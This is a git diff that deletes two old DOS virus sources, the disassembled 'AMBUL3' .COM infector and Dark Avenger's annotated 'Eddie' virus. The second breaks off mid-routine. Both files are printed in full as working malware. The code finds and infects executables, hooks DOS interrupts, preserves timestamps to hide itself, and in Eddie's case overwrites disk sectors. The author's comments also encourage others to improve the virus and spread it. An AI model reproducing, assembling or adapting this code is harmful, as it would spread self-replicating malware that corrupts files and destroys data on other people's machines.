(20).ASM deleted file mode 100755 index ba4566c..0000000 
--- a/a/AMBUL3 (20).ASM
+++ /dev/null
@@ -1,390 +0,0 @@ -;NAME: AMBUL3.C-M -;FILE SIZE: 00330h - 816d -;START (CS:IP): 00100h -;CODE END: 00430h -;CODE ORIGIN: 00100h -;DATE: Sun Aug 16 15:45:06 1992 - -CODE SEGMENT BYTE PUBLIC 'CODE' -ASSUME CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING - -P00100 PROC - ORG 0100h - -H00100: JMP H00114 ;00100 E91100 ___ -;Will be overwritten with B4 09 BA-- MOV AH,09 and MOV DX -;--------------------------------------------------- - OR [BX+DI],AX ;00103 0901 __ -;DX gets this, location of string. - INT 21h ;Indef_INT:21h-AH ;00105 CD21 _! - INT 20h ;B-TERM_norm:20h ;00107 CD20 _ -;--------------------------------------------------- - DB "Infect me!$" ;00109 496E6665637420 -;--------------------------------------------------- -H00114: CALL H00118 ; . . . . . . . . . ;00114 E80100 ___ - ADD [BP-7Fh],BX ;00117 015E81 _^_ - OUT DX,AL ;Port_OUT:DX ;0011A EE _ - ADD AX,[BX+DI] ;0011B 0301 __ - CALL H0013A ; . . . . . . . . . ;0011D E81A00 ___ - CALL H0013A ; . . . . . . . . . ;00120 E81700 ___ - CALL H002F8 ; . . . . . . . . . ;00123 E8D201 ___ - LEA BX,[SI+0419h] ;00126 8D9C1904 ____ - MOV DI,0100h ;0012A BF0001 ___ - MOV AL,[BX] ;0012D 8A07 __ - MOV [DI],AL ;0012F 8805 __ - MOV AX,[BX+01h] ;00131 8B4701 _G_ - MOV [DI+01h],AX ;00134 894501 _E_ - JMP DI ;00137 FFE7 __ -;--------------------------------------------------- - RET ;RET_Near ;00139 C3 _ -;--------------------------------------------------- -H0013A: CALL H0021B ; . . . . . . . . . ;0013A E8DE00 ___ - MOV AL,[SI+0428h] ;0013D 8A842804 __(_ - OR AL,AL ;00141 0AC0 __ - JZ H00139 ;00143 74F4 t_ - LEA BX,[SI+040Fh] ;00145 8D9C0F04 ____ - INC Word Ptr [BX] ;00149 FF07 __ - LEA DX,[SI+0428h] ;0014B 8D942804 __(_ - MOV AX,3D02h ;0014F B8023D __= - INT 21h ;2-Open_Fl_Hdl ;00152 CD21 _! - MOV [SI+0417h],AX ;00154 89841704 ____ - MOV BX,[SI+0417h] ;00158 8B9C1704 ____ - MOV CX,0003h ;0015C B90300 ___ - LEA DX,[SI+0414h] ;0015F 8D941404 ____ - MOV AH,3Fh ;00163 B43F _? - INT 21h ;2-Rd_Fl_Hdl ;00165 CD21 _! 
- MOV AL,[SI+0414h] ;00167 8A841404 ____ - CMP AL,0E9h ;0016B 3CE9 <_ - JNZ H001AE ;0016D 753F u? - MOV DX,[SI+0415h] ;0016F 8B941504 ____ - MOV BX,[SI+0417h] ;00173 8B9C1704 ____ - ADD DX,+03h ;00177 83C203 ___ - XOR CX,CX ;0017A 33C9 3_ - MOV AX,4200h ;0017C B80042 __B - INT 21h ;2-Mov_Fl_Hdl_Ptr ;0017F CD21 _! - MOV BX,[SI+0417h] ;00181 8B9C1704 ____ - MOV CX,0006h ;00185 B90600 ___ - LEA DX,[SI+041Ch] ;00188 8D941C04 ____ - MOV AH,3Fh ;0018C B43F _? - INT 21h ;2-Rd_Fl_Hdl ;0018E CD21 _! - MOV AX,[SI+041Ch] ;00190 8B841C04 ____ - MOV BX,[SI+041Eh] ;00194 8B9C1E04 ____ - MOV CX,[SI+0420h] ;00198 8B8C2004 __ _ - CMP AX,[SI+0100h] ;0019C 3B840001 ;___ - JNZ H001AE ;001A0 750C u_ - CMP BX,[SI+0102h] ;001A2 3B9C0201 ;___ - JNZ H001AE ;001A6 7506 u_ - CMP CX,[SI+0104h] ;001A8 3B8C0401 ;___ - JZ H00212 ;001AC 7464 td -H001AE: MOV BX,[SI+0417h] ;001AE 8B9C1704 ____ - XOR CX,CX ;001B2 33C9 3_ - XOR DX,DX ;001B4 33D2 3_ - MOV AX,4202h ;001B6 B80242 __B - INT 21h ;2-Mov_Fl_Hdl_Ptr ;001B9 CD21 _! - SUB AX,0003h ;001BB 2D0300 -__ - MOV [SI+0412h],AX ;001BE 89841204 ____ - MOV BX,[SI+0417h] ;001C2 8B9C1704 ____ - MOV AX,5700h ;001C6 B80057 __W - INT 21h ;2-Fl_Hdl_Date_Time ;001C9 CD21 _! - PUSH CX ;001CB 51 Q - PUSH DX ;001CC 52 R - MOV BX,[SI+0417h] ;001CD 8B9C1704 ____ - MOV CX,0319h ;001D1 B91903 ___ - LEA DX,[SI+0100h] ;001D4 8D940001 ____ - MOV AH,40h ;001D8 B440 _@ - INT 21h ;2-Wr_Fl_Hdl ;001DA CD21 _! - MOV BX,[SI+0417h] ;001DC 8B9C1704 ____ - MOV CX,0003h ;001E0 B90300 ___ - LEA DX,[SI+0414h] ;001E3 8D941404 ____ - MOV AH,40h ;001E7 B440 _@ - INT 21h ;2-Wr_Fl_Hdl ;001E9 CD21 _! - MOV BX,[SI+0417h] ;001EB 8B9C1704 ____ - XOR CX,CX ;001EF 33C9 3_ - XOR DX,DX ;001F1 33D2 3_ - MOV AX,4200h ;001F3 B80042 __B - INT 21h ;2-Mov_Fl_Hdl_Ptr ;001F6 CD21 _! - MOV BX,[SI+0417h] ;001F8 8B9C1704 ____ - MOV CX,0003h ;001FC B90300 ___ - LEA DX,[SI+0411h] ;001FF 8D941104 ____ - MOV AH,40h ;00203 B440 _@ - INT 21h ;2-Wr_Fl_Hdl ;00205 CD21 _! 
- POP DX ;00207 5A Z - POP CX ;00208 59 Y - MOV BX,[SI+0417h] ;00209 8B9C1704 ____ - MOV AX,5701h ;0020D B80157 __W - INT 21h ;2-Fl_Hdl_Date_Time ;00210 CD21 _! -H00212: MOV BX,[SI+0417h] ;00212 8B9C1704 ____ - MOV AH,3Eh ;00216 B43E _> - INT 21h ;2-Close_Fl_Hdl ;00218 CD21 _! - RET ;RET_Near ;0021A C3 _ -;--------------------------------------------------- -H0021B: MOV AX,DS:[002Ch] ;0021B A12C00 _,_ - MOV ES,AX ;ES_Chg ;0021E 8EC0 __ - PUSH DS ;00220 1E _ - MOV AX,0040h ;00221 B84000 _@_ - MOV DS,AX ;DS_Chg ;00224 8ED8 __ - MOV BP,DS:[006Ch] ;00226 8B2E6C00 _.l_ - POP DS ;0022A 1F _ - TEST BP,0003h ;0022B F7C50300 ____ - JZ H00248 ;0022F 7417 t_ - XOR BX,BX ;00231 33DB 3_ - MOV AX,ES:[BX] ;ES_Ovrd ;00233 268B07 &__ - CMP AX,4150h ;00236 3D5041 =PA - JNZ H00243 ;00239 7508 u_ - CMP Word Ptr ES:[BX+02h],4854h - ;ES_Ovrd ;0023B 26817F025448 &___TH - JZ H0024E ;00241 740B t_ -H00243: INC BX ;00243 43 C - OR AX,AX ;00244 0BC0 __ - JNZ H00233 ;00246 75EB u_ -H00248: LEA DI,[SI+0428h] ;00248 8DBC2804 __(_ - JMP Short H00280 ;0024C EB32 _2 -;--------------------------------------------------- -H0024E: ADD BX,+05h ;0024E 83C305 ___ - LEA DI,[SI+0428h] ;00251 8DBC2804 __(_ - MOV AL,ES:[BX] ;ES_Ovrd ;00255 268A07 &__ - INC BX ;00258 43 C - OR AL,AL ;00259 0AC0 __ - JZ H00276 ;0025B 7419 t_ - CMP AL,3Bh ;0025D 3C3B <; - JZ H00266 ;0025F 7405 t_ - MOV [DI],AL ;00261 8805 __ - INC DI ;00263 47 G - JMP Short H00255 ;00264 EBEF __ -;--------------------------------------------------- -H00266: CMP Byte Ptr ES:[BX],00h - ;ES_Ovrd ;00266 26803F00 &_?_ - JZ H00276 ;0026A 740A t_ - SHR BP,1 ;0026C D1ED __ - SHR BP,1 ;0026E D1ED __ - TEST BP,0003h ;00270 F7C50300 ____ - JNZ H00251 ;00274 75DB u_ -H00276: CMP Byte Ptr [DI-01h],5Ch ;00276 807DFF5C _}_\ - JZ H00280 ;0027A 7404 t_ - MOV Byte Ptr [DI],5Ch ;0027C C6055C __\ - INC DI ;0027F 47 G -H00280: PUSH DS ;00280 1E _ - POP ES ;00281 07 _ - MOV [SI+0422h],DI ;00282 89BC2204 __"_ -;********* Put "*.COM" at ES:DI - MOV AX,2E2Ah ;00286 
B82A2E _*. - STOSW ;00289 AB _ - MOV AX,4F43h ;0028A B8434F _CO - STOSW ;0028D AB _ - MOV AX,004Dh ;0028E B84D00 _M_ - STOSW ;00291 AB _ -;********** - PUSH ES ;00292 06 _ - MOV AH,2Fh ;00293 B42F _/ - INT 21h ;2-Get_DTA ;00295 CD21 _! - MOV AX,ES ;00297 8CC0 __ - MOV [SI+0424h],AX ;00299 89842404 __$_ - MOV [SI+0426h],BX ;0029D 899C2604 __&_ - POP ES ;002A1 07 _ - LEA DX,[SI+0478h] ;002A2 8D947804 __x_ - MOV AH,1Ah ;002A6 B41A __ - INT 21h ;1-Set_DTA ;002A8 CD21 _! - LEA DX,[SI+0428h] ;002AA 8D942804 __(_ - XOR CX,CX ;002AE 33C9 3_ - MOV AH,4Eh ;002B0 B44E _N - INT 21h ;2-Srch_1st_Fl_Hdl ;002B2 CD21 _! - JNB H002BE ;002B4 7308 s_ - XOR AX,AX ;002B6 33C0 3_ - MOV [SI+0428h],AX ;002B8 89842804 __(_ - JMP Short H002E7 ;002BC EB29 _) -;--------------------------------------------------- -H002BE: PUSH DS ;002BE 1E _ - MOV AX,0040h ;002BF B84000 _@_ - MOV DS,AX ;DS_Chg ;002C2 8ED8 __ - ROR BP,1 ;002C4 D1CD __ - XOR BP,DS:[006Ch] ;002C6 332E6C00 3.l_ - POP DS ;002CA 1F _ - TEST BP,0007h ;002CB F7C50700 ____ - JZ H002D7 ;002CF 7406 t_ - MOV AH,4Fh ;002D1 B44F _O - INT 21h ;2-Srch_Nxt_Fl_Hdl ;002D3 CD21 _! - JNB H002BE ;002D5 73E7 s_ -H002D7: MOV DI,[SI+0422h] ;002D7 8BBC2204 __"_ - LEA BX,[SI+0496h] ;002DB 8D9C9604 ____ - MOV AL,[BX] ;002DF 8A07 __ - INC BX ;002E1 43 C - STOSB ;002E2 AA _ - OR AL,AL ;002E3 0AC0 __ - JNZ H002DF ;002E5 75F8 u_ -H002E7: MOV BX,[SI+0426h] ;002E7 8B9C2604 __&_ - MOV AX,[SI+0424h] ;002EB 8B842404 __$_ - PUSH DS ;002EF 1E _ - MOV DS,AX ;DS_Chg ;002F0 8ED8 __ - MOV AH,1Ah ;002F2 B41A __ - INT 21h ;1-Set_DTA ;002F4 CD21 _! 
- POP DS ;002F6 1F _ - RET ;RET_Near ;002F7 C3 _ -;--------------------------------------------------- -H002F8: PUSH ES ;002F8 06 _ - MOV AX,[SI+040Fh] ;002F9 8B840F04 ____ - AND AX,0007h ;002FD 250700 %__ - CMP AX,0006h ;00300 3D0600 =__ - JNZ H0031A ;00303 7515 u_ - MOV AX,0040h ;00305 B84000 _@_ - MOV ES,AX ;ES_Chg ;00308 8EC0 __ - MOV AX,ES:[000Ch] ;ES_Ovrd ;0030A 26A10C00 &___ - OR AX,AX ;0030E 0BC0 __ - JNZ H0031A ;00310 7508 u_ - INC Word Ptr ES:[000Ch] - ;ES_Ovrd ;00312 26FF060C00 &____ - CALL H0031C ; . . . . . . . . . ;00317 E80200 ___ -H0031A: POP ES ;0031A 07 _ - RET ;RET_Near ;0031B C3 _ -;--------------------------------------------------- -H0031C: PUSH DS ;0031C 1E _ - MOV DI,0B800h ;0031D BF00B8 ___ - MOV AX,0040h ;00320 B84000 _@_ - MOV DS,AX ;DS_Chg ;00323 8ED8 __ - MOV AL,DS:[0049h] ;00325 A04900 _I_ - CMP AL,07h ;00328 3C07 <_ - JNZ H0032F ;0032A 7503 u_ - MOV DI,0B000h ;0032C BF00B0 ___ -H0032F: MOV ES,DI ;ES_Chg ;0032F 8EC7 __ - POP DS ;00331 1F _ - MOV BP,0FFF0h ;00332 BDF0FF ___ - MOV DX,0000h ;00335 BA0000 ___ - MOV CX,0010h ;00338 B91000 ___ - CALL H0037D ; . . . . . . . . . ;0033B E83F00 _?_ - INC DX ;0033E 42 B - LOOP H0033B ;0033F E2FA __ - CALL H0035A ; . . . . . . . . . ;00341 E81600 ___ - CALL H003C2 ; . . . . . . . . . ;00344 E87B00 _{_ - INC BP ;00347 45 E - CMP BP,+50h ;00348 83FD50 __P - JNZ H00335 ;0034B 75E8 u_ - CALL SILENC ; . . . . . . . . . 
;0034D E80300 ___ - PUSH DS ;00350 1E _ - POP ES ;00351 07 _ - RET ;RET_Near ;00352 C3 _ -;--------------------------------------------------- -;********** Silence speaker -SILENC: IN AL,61h ;Port_IN:61h ;00353 E461 _a - AND AL,0FCh ;00355 24FC $_ - OUT 61h,AL ;Port_OUT:61h ;00357 E661 _a - RET ;RET_Near ;00359 C3 _ -;--------------------------------------------------- -H0035A: MOV DX,07D0h ;0035A BAD007 ___ - TEST BP,0004h ;0035D F7C50400 ____ - JZ H00366 ;00361 7403 t_ - MOV DX,0BB8h ;00363 BAB80B ___ -H00366: IN AL,61h ;Port_IN:61h ;00366 E461 _a - TEST AL,03h ;00368 A803 __ - JNZ H00374 ;0036A 7508 u_ - OR AL,03h ;0036C 0C03 __ - OUT 61h,AL ;Port_OUT:61h ;0036E E661 _a - MOV AL,0B6h ;00370 B0B6 __ - OUT 43h,AL ;Port_OUT:43h ;00372 E643 _C -H00374: MOV AX,DX ;00374 8BC2 __ - OUT 42h,AL ;Port_OUT:42h ;00376 E642 _B - MOV AL,AH ;00378 88E0 __ - OUT 42h,AL ;Port_OUT:42h ;0037A E642 _B - RET ;RET_Near ;0037C C3 _ -;--------------------------------------------------- -H0037D: PUSH CX ;0037D 51 Q - PUSH DX ;0037E 52 R - LEA BX,[SI+03BFh] ;0037F 8D9CBF03 ____ - ADD BX,DX ;00383 03DA __ - ADD DX,BP ;00385 01EA __ - OR DX,DX ;00387 0BD2 __ - JS H003BF ;00389 7834 x4 - CMP DX,+50h ;0038B 83FA50 __P - JNB H003BF ;0038E 732F s/ - MOV DI,0C80h ;00390 BF800C ___ - ADD DI,DX ;00393 03FA __ - ADD DI,DX ;00395 03FA __ - SUB DX,BP ;00397 29EA )_ - MOV CX,0005h ;00399 B90500 ___ - MOV AH,07h ;0039C B407 __ - MOV AL,[BX] ;0039E 8A07 __ - SUB AL,07h ;003A0 2C07 ,_ - ADD AL,CL ;003A2 02C1 __ - SUB AL,DL ;003A4 28D0 (_ - CMP CX,+05h ;003A6 83F905 ___ - JNZ H003B5 ;003A9 750A u_ - MOV AH,0Fh ;003AB B40F __ - TEST BP,0003h ;003AD F7C50300 ____ - JZ H003B5 ;003B1 7402 t_ - MOV AL,20h ;003B3 B020 _ -H003B5: STOSW ;003B5 AB _ - ADD BX,+10h ;003B6 83C310 ___ - ADD DI,009Eh ;003B9 81C79E00 ____ - LOOP H0039C ;003BD E2DD __ -H003BF: POP DX ;003BF 5A Z - POP CX ;003C0 59 Y - RET ;RET_Near ;003C1 C3 _ -;--------------------------------------------------- -H003C2: PUSH DS ;003C2 1E _ - MOV 
AX,0040h ;003C3 B84000 _@_ - MOV DS,AX ;DS_Chg ;003C6 8ED8 __ - MOV AX,DS:[006Ch] ;003C8 A16C00 _l_ - CMP AX,DS:[006Ch] ;003CB 3B066C00 ;_l_ - JZ H003CB ;003CF 74FA t_ - POP DS ;003D1 1F _ - RET ;RET_Near ;003D2 C3 _ -;--------------------------------------------------- - DB '"' ;003D3 22 -;--------------------------------------------------- - AND SP,[SI] ;SP_Chg ;003D4 2324 #$ - AND AX,2726h ;003D6 252627 %&' - SUB [BX+DI],CH ;003D9 2829 () - DB 66h ;Indef_OP:66h ;003DB 66 f -;--------------------------------------------------- - XCHG DI,[BP+DI] ;003DC 873B _; - SUB AX,2F2Eh ;003DE 2D2E2F -./ - XOR [BX+DI],DH ;003E1 3031 01 - AND SP,AX ;SP_Chg ;003E3 23E0 #_ - LOOPZ H003C9 ;003E5 E1E2 __ - JCXZ H003CD ;003E7 E3E4 __ - IN AX,0E6h ;Port_IN:E6h ;003E9 E5E6 __ - OUT 0E7h,AX ;Port_OUT:E7h ;003EB E7E7 __ - JMP H0EFDA ;003ED E9EAEB ___ -;--------------------------------------------------- - XOR [BX+DI],DH ;003F0 3031 01 - XOR AH,[SI] ;003F2 3224 2$ - LOOPNZ H003D7 ;003F4 E0E1 __ - LOOP H003DB ;003F6 E2E3 __ - CALL H0EE25 ; . . . . . . . . . 
;003F8 E82AEA _*_ - OUT 0E8h,AX ;Port_OUT:E8h ;003FB E7E8 __ - JMP H0342F ;003FD E92F30 _/0 -;--------------------------------------------------- - DB 6Dh ;286_INSW ;00400 6D m -;--------------------------------------------------- - XOR DH,[BP+DI] ;00401 3233 23 - AND AX,0E2E1h ;00403 25E1E2 %__ - JCXZ H003EC ;00406 E3E4 __ - IN AX,0E7h ;Port_IN:E7h ;00408 E5E7 __ - OUT 0E8h,AX ;Port_OUT:E8h ;0040A E7E8 __ - JMP H0EFF9 ;0040C E9EAEB ___ -;--------------------------------------------------- - IN AL,DX ;Port_IN:DX ;0040F EC _ - IN AX,DX ;Port_IN:DX ;00410 ED _ - OUT DX,AL ;Port_OUT:DX ;00411 EE _ - OUT DX,AX ;Port_OUT:DX ;00412 EF _ - OUT 0E7h,AL ;ES_Ovrd ;00413 26E6E7 &__ - SUB [BX+DI+5Ah],BX ;00416 29595A )YZ - SUB AL,0ECh ;00419 2CEC ,_ - IN AX,DX ;Port_IN:DX ;0041B ED _ - OUT DX,AL ;Port_OUT:DX ;0041C EE _ - OUT DX,AX ;Port_OUT:DX ;0041D EF _ - DB 0F0h ;LOCK:F0h ;0041E F0 _ - XOR AH,[BP+SI+34] ;0041F 326234 2b4 -;--------------------------------------------------- - HLT ;SYSTEM_HALT ;00422 F4 _ - OR AL,[BX+SI] ;00423 0A00 __ - JMP H00439 ;00425 E91100 ___ -;--------------------------------------------------- - DB 0B4h, 09h, 0BAh ;First three bytes ;00428 - DB 05,00 ;Dunno ;0042B - DB 0B4h, 09h, 0BAh ;First three bytes ;0042D - ;AGAIN! Wierd -P00100 ENDP - -CODE ENDS - END H00100 - -;------------------------------------------------------------------------------- diff --git a/a/AVENGSRC (23).ASM b/a/AVENGSRC (23).ASM deleted file mode 100755 index a1cb9ff..0000000 --- a/a/AVENGSRC (23).ASM +++ /dev/null 
@@ -1,999 +0,0 @@ - - -Ok PAUL, Here is the file you requested, - - - -;************************ -;* * -;* E D D I E * -;* * -;* by Dark Avenger * -;* * -;* 3-JAN-1989 * -;* * -;* version 1.31x * -;* * -;************************ - -; "Blessed is he who expects nothing, for he shall not be disappointed." - -; The original source of one of the first Bulgarian viruses is in front of -; you. As you may notice, it's full of rubbish and bugs, but nevertheless -; the virus has spread surprisingly quickly troughout the country and made a -; quick round the globe. (It's well-known in Eastern and Western Europe, as -; well as in USA.) Due to the aniversary of its creation, the source is -; distributed freely. You have the rights to distribute the source which can -; be charged or free of charge, with the only condition not to modify it. -; The one, who intentionaly distributes this source modified in any way will -; be punished! Still, the author will be glad if any of you improves it and -; spreads the resulting executive file (i.e., the virus itself). Pay -; attention to the fact that after you assemble the source, the resulting -; .COM-file cannot be run. For that purpose you have to create a three-byte -; file, consisting of the hex numbers 0e9h, 68h, 0 and then to combine the -; two files. Don't try to place a JMP at the beginning of the source. - -; DISCLAIMER: The author does not take any responsability for any damage, -; either direct or implied, caused by the usage or not of this source or of -; the resulting code after assembly. No warrant is made about the product -; functionability or quality. - -; I cannot resist to express my special gratitude to my "populazer" Dipl. -; eng. Vesselin Bontchev, who makes me famous and who, wishing it or -; not, helps very much in the spreading of my viruses, in spite of the fact -; that he tries to do just the opposite (writing programs in C has never -; led to any good). -; Greetings to all virus writers! 
- -code segment - assume cs:code,ds:code -copyright: - db 'Eddie lives...somewhere in time!',0 -date_stamp: - dd 12239000h -checksum: - db 30 - -; Return the control to an .EXE file: -; Restores DS=ES=PSP, loads SS:SP and CS:IP. - - - - - -exit_exe: - mov bx,es - add bx,10h - add bx,word ptr cs:[si+call_adr+2] - mov word ptr cs:[si+patch+2],bx - mov bx,word ptr cs:[si+call_adr] - mov word ptr cs:[si+patch],bx - mov bx,es - add bx,10h - add bx,word ptr cs:[si+stack_pointer+2] - mov ss,bx - mov sp,word ptr cs:[si+stack_pointer] - db 0eah ;JMP XXXX:YYYY -patch: - dd 0 - -; Returns control to a .COM file: -; Restores the first 3 bytes in the -; beginning of the file, loads SP and IP. - -exit_com: - - - - - mov di,100h - add si,offset my_save - movsb - movsw - mov sp,ds:[6] ;This is incorrect - xor bx,bx - push bx - jmp [si-11] ;si+call_adr-top_file - -; Program entry point - -startup: - call relative -relative: - pop si ;SI = $ - sub si,offset relative - cld - cmp word ptr cs:[si+my_save],5a4dh - je exe_ok - cli - mov sp,si ;A separate stack is supported for - add sp,offset top_file+100h ;the .COM files, in order not to - sti ;overlap the stack by the program - cmp sp,ds:[6] - jnc exit_com -exe_ok: - push ax - push es - push si - push ds - mov di,si - -; Looking for the address of INT 13h handler in ROM-BIOS - - xor ax,ax - push ax - mov ds,ax - les ax,ds:[13h*4] - mov word ptr cs:[si+fdisk],ax - mov word ptr cs:[si+fdisk+2],es - mov word ptr cs:[si+disk],ax - mov word ptr cs:[si+disk+2],es - mov ax,ds:[40h*4+2] ;The INT 13h vector is moved to INT 40h - cmp ax,0f000h ;for diskettes if a hard disk is - jne nofdisk ;available - mov word ptr cs:[si+disk+2],ax - mov ax,ds:[40h*4] - mov word ptr cs:[si+disk],ax - mov dl,80h - mov ax,ds:[41h*4+2] ;INT 41h usually points the segment, - cmp ax,0f000h ;where the original INT 13h vector is - je isfdisk - cmp ah,0c8h - jc nofdisk - cmp ah,0f4h - jnc nofdisk - test al,7fh - jnz nofdisk - mov ds,ax - cmp ds:[0],0aa55h - jne nofdisk 
- mov dl,ds:[2] -isfdisk: - mov ds,ax - xor dh,dh - mov cl,9 - shl dx,cl - mov cx,dx - xor si,si -findvect: - lodsw ;Occasionally begins with: - cmp ax,0fa80h ; CMP DL,80h - jne altchk ; JNC somewhere - lodsw - cmp ax,7380h - je intchk - jne nxt0 -altchk: - cmp ax,0c2f6h ;or with: - jne nxt ; TEST DL,80h - lodsw ; JNZ somewhere - cmp ax,7580h - jne nxt0 -intchk: - inc si ;then there is: - lodsw ; INT 40h - cmp ax,40cdh - je found - sub si,3 -nxt0: - dec si - dec si -nxt: - dec si - loop findvect - jmp short nofdisk -found: - sub si,7 - mov word ptr cs:[di+fdisk],si - mov word ptr cs:[di+fdisk+2],ds -nofdisk: - mov si,di - pop ds - -; Check whether the program is present in memory: - - les ax,ds:[21h*4] - mov word ptr cs:[si+save_int_21],ax - mov word ptr cs:[si+save_int_21+2],es - push cs - pop ds - cmp ax,offset int_21 - jne bad_func - xor di,di - mov cx,offset my_size -scan_func: - lodsb - scasb - jne bad_func - loop scan_func - pop es - jmp go_program - -; Move the program to the top of memory: -; (it's full of rubbish and bugs here) - -bad_func: - pop es - mov ah,49h - int 21h - mov bx,0ffffh - mov ah,48h - int 21h - sub bx,(top_bz+my_bz+1ch-1)/16+2 - jc go_program - mov cx,es - stc - adc cx,bx - mov ah,4ah - int 21h - mov bx,(offset top_bz+offset my_bz+1ch-1)/16+1 - stc - sbb es:[2],bx - push es - mov es,cx - mov ah,4ah - int 21h - mov ax,es - dec ax - mov ds,ax - mov word ptr ds:[1],8 - call mul_16 - mov bx,ax - mov cx,dx - pop ds - mov ax,ds - call mul_16 - add ax,ds:[6] - adc dx,0 - sub ax,bx - sbb dx,cx - jc mem_ok - sub ds:[6],ax ;Reduction of the segment size -mem_ok: - pop si - push si - push ds - push cs - xor di,di - mov ds,di - lds ax,ds:[27h*4] - mov word ptr cs:[si+save_int_27],ax - mov word ptr cs:[si+save_int_27+2],ds - pop ds - mov cx,offset aux_size - rep movsb - xor ax,ax - mov ds,ax - mov ds:[21h*4],offset int_21;Intercept INT 21h and INT 27h - mov ds:[21h*4+2],es - mov ds:[27h*4],offset int_27 - mov ds:[27h*4+2],es - mov word ptr 
es:[filehndl],ax - pop es -go_program: - pop si - -; Smash the next disk sector: - - xor ax,ax - mov ds,ax - mov ax,ds:[13h*4] - mov word ptr cs:[si+save_int_13],ax - mov ax,ds:[13h*4+2] - mov word ptr cs:[si+save_int_13+2],ax - mov ds:[13h*4],offset int_13 - add ds:[13h*4],si - mov ds:[13h*4+2],cs - pop ds - push ds - push si - mov bx,si - lds ax,ds:[2ah] - xor si,si - mov dx,si -scan_envir: ;Fetch program's name - lodsw ;(with DOS 2.x it doesn't work anyway) - dec si - test ax,ax - jnz scan_envir - add si,3 - lodsb - -; The following instruction is a complete nonsense. Try to enter a drive & -; directory path in lowercase, then run an infected program from there. -; As a result of an error here + an error in DOS the next sector is not -; smashed. Two memory bytes are smashed instead, most probably onto the -; infected program. - - sub al,'A' - mov cx,1 - push cs - pop ds - add bx,offset int_27 - push ax - push bx - push cx - int 25h - pop ax - pop cx - pop bx - inc byte ptr [bx+0ah] - and byte ptr [bx+0ah],0fh ;It seems that 15 times doing - jnz store_sec ;nothing is not enough for some. - mov al,[bx+10h] - xor ah,ah - mul word ptr [bx+16h] - add ax,[bx+0eh] - push ax - mov ax,[bx+11h] - mov dx,32 - mul dx - div word ptr [bx+0bh] - pop dx - add dx,ax - mov ax,[bx+8] - add ax,40h - cmp ax,[bx+13h] - jc store_new - inc ax - and ax,3fh - add ax,dx - cmp ax,[bx+13h] - jnc small_disk -store_new: - mov [bx+8],ax -store_sec: - pop ax - xor dx,dx - push ax - push bx - push cx - int 26h - - -; The writing trough this interrupt is not the smartest thing, bacause it -; can be intercepted (what Vesselin Bontchev has managed to notice). 
- - pop ax - pop cx - pop bx - pop ax - cmp byte ptr [bx+0ah],0 - jne not_now - mov dx,[bx+8] - pop bx - push bx - int 26h -small_disk: - pop ax -not_now: - pop si - xor ax,ax - mov ds,ax - mov ax,word ptr cs:[si+save_int_13] - mov ds:[13h*4],ax - mov ax,word ptr cs:[si+save_int_13+2] - mov ds:[13h*4+2],ax - pop ds - pop ax - cmp word ptr cs:[si+my_save],5a4dh - jne go_exit_com - jmp exit_exe -go_exit_com: - jmp exit_com -int_24: - mov al,3 ;This instruction seems unnecessary - iret - -; INT 27h handler (this is necessary) - -int_27: - pushf - call alloc - popf - jmp dword ptr cs:[save_int_27] - -; During the DOS functions Set & Get Vector it seems that the virus has not -; intercepted them (this is a doubtfull advantage and it is a possible -; source of errors with some "intelligent" programs) - -set_int_27: - mov word ptr cs:[save_int_27],dx - mov word ptr cs:[save_int_27+2],ds - popf - iret -set_int_21: - mov word ptr cs:[save_int_21],dx - mov word ptr cs:[save_int_21+2],ds - popf - iret -get_int_27: - les bx,dword ptr cs:[save_int_27] - popf - iret -get_int_21: - les bx,dword ptr cs:[save_int_21] - popf - iret - -exec: - - - call do_file - call alloc - popf - jmp dword ptr cs:[save_int_21] - - db 'Diana P.',0 - -; INT 21h handler. Infects files during execution, copying, browsing or -; creating and some other operations. The execution of functions 0 and 26h -; has bad consequences. 
- -int_21: - push bp - mov bp,sp - push [bp+6] - popf - pop bp - pushf - call ontop - cmp ax,2521h - je set_int_21 - cmp ax,2527h - je set_int_27 - cmp ax,3521h - je get_int_21 - cmp ax,3527h - je get_int_27 - cld - cmp ax,4b00h - je exec - cmp ah,3ch - je create - cmp ah,3eh - je close - cmp ah,5bh - jne not_create -create: - cmp word ptr cs:[filehndl],0;May be 0 if the file is open - jne dont_touch - call see_name - jnz dont_touch - call alloc - popf - call function - jc int_exit - pushf - push es - push cs - pop es - push si - push di - push cx - push ax - mov di,offset filehndl - stosw - mov si,dx - mov cx,65 -move_name: - lodsb - stosb - test al,al - jz all_ok - loop move_name - mov word ptr es:[filehndl],cx -all_ok: - pop ax - pop cx - pop di - pop si - pop es -go_exit: - popf - jnc int_exit ;JMP -close: - cmp bx,word ptr cs:[filehndl] - jne dont_touch - test bx,bx - jz dont_touch - call alloc - popf - call function - jc int_exit - pushf - push ds - push cs - pop ds - push dx - mov dx,offset filehndl+2 - call do_file - mov word ptr cs:[filehndl],0 - pop dx - pop ds - jmp go_exit -not_create: - cmp ah,3dh - je touch - cmp ah,43h - je touch - cmp ah,56h ;Unfortunately, the command inter- - jne dont_touch ;preter does not use this function -touch: - call see_name - jnz dont_touch - call do_file -dont_touch: - call alloc - popf - call function -int_exit: - pushf - push ds - call get_chain - mov byte ptr ds:[0],'Z' - pop ds - popf -dummy proc far ;??? - ret 2 -dummy endp - -; Checks whether the file is .COM or .EXE. -; It is not called upon file execution. - -see_name: - push ax - push si - mov si,dx -scan_name: - lodsb - test al,al - jz bad_name - cmp al,'.' 
- jnz scan_name - call get_byte - mov ah,al - call get_byte - cmp ax,'co' - jz pos_com - cmp ax,'ex' - jnz good_name - call get_byte - cmp al,'e' - jmp short good_name -pos_com: - call get_byte - cmp al,'m' - jmp short good_name -bad_name: - inc al -good_name: - pop si - pop ax - ret - -; Converts into lowercase (the subroutines are a great thing). - -get_byte: - lodsb - cmp al,'C' - jc byte_got - cmp al,'Y' - jnc byte_got - add al,20h -byte_got: - ret - -; Calls the original INT 21h. - -function: - pushf - call dword ptr cs:[save_int_21] - ret - -; Arrange to infect an executable file. - -do_file: - push ds ;Save the registers in stack - push es - push si - push di - push ax - push bx - push cx - push dx - mov si,ds - xor ax,ax - mov ds,ax - les ax,ds:[24h*4] ;Saves INT 13h and INT 24h in stack - push es ;and changes them with what is needed - push ax - mov ds:[24h*4],offset int_24 - mov ds:[24h*4+2],cs - les ax,ds:[13h*4] - mov word ptr cs:[save_int_13],ax - mov word ptr cs:[save_int_13+2],es - mov ds:[13h*4],offset int_13 - mov ds:[13h*4+2],cs - push es - push ax - mov ds,si - xor cx,cx ;Arranges to infect Read-only files - mov 